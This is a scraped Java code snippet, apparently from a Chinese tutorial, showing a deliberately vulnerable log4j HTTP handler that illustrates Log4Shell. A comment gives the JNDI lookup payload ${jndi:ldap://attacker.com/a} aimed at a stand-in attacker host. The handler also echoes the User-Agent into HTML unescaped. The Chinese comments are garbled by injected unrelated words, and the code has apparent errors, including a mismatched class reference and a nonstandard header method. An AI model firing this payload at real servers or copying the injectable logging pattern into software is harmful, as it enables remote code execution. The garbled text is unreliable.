
复制import org.apache.log4j.Logger;             import java.io.*;             import java.sql.SQLException;             import java.util.*;             public class VulnerableLog4jExampleHandler implements HttpHandler {               static Logger log = Logger.getLogger(log4jExample.class.getName());               /**                * 示例伪代码:一个简单的史诗司HTTP端点,其中读取User Agent信息并进行日志记录;                */               public void handle(HttpExchange he) throws IOException {                // 获取user-agent信息                 String userAgent = he.getRequestHeader("user-agent");                 // 此行记录日志的站群服务器洞们代码,通过记录攻击者控制的服务器托管史诗司HTTP用户代理标头来触发RCE。                 // 攻击者可以设置他们的亿华云洞们User-Agent header到${jndi:ldap://attacker.com/a}                 log.info("Request User Agent:" + userAgent);                 String response = "<h1>Hello There, " + userAgent + "!</h1>";                 he.sendResponseHeaders(200, response.length());                 OutputStream os = he.getResponseBody();                 os.write(response.getBytes());                 os.close();               }             }             1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.28.